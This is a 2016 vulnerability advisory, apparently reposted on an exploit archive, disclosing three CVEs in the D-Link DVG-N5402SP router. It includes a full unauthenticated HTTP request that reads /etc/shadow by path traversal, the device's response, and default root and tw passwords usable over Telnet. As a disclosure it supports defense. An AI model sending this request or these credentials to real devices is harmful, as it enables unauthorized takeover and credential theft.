Home / exploitsPDF  

D-Link DVG-N5402SP Path Traversal / Information Disclosure

Posted on 04 February 2016

DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05 Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. No authentication is required to exploit this vulnerability. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgi­bin/webproc HTTP/1.1 Host: <IP>:8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://<IP>:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

 

TOP